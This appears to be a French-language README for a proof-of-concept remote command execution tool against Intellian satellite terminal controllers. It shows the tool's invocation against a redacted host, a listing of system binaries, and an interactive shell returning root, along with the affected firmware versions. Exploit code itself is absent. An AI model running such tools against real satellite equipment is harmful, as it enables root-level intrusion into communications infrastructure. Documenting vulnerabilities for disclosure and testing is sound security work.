
Script PoC montrant une vulnérabilité RCE sur Intellian Satellite controller.
Satellian est un script PoC qui montre une vulnérabilité RCE sur le contrôleur satellite Intellian (Intellian Aptus Web).
Le script suivant tentera de lister tous les binaires du système et permettra ensuite au testeur d'interagir directement avec le serveur (généralement en tant que root).
xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
________________________________________
(__) / \
(oo) ( Intellian Satellite Terminal PoC )
/-------\/ --' \________________________________________/
/ | ||
* ||----||
Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...
Satellian $ id
uid=0(root) gid=0(root)
Intellian v1.12, v1.21, v1.24.
Toutes les informations contenues dans ce dépôt sont à des fins éducatives uniquement. L'auteur du dépôt n'est en aucun cas responsable de toute mauvaise utilisation de ces informations. Ce script est simplement une preuve de concept et n'a en aucun cas été développé pour des activités malveillantes.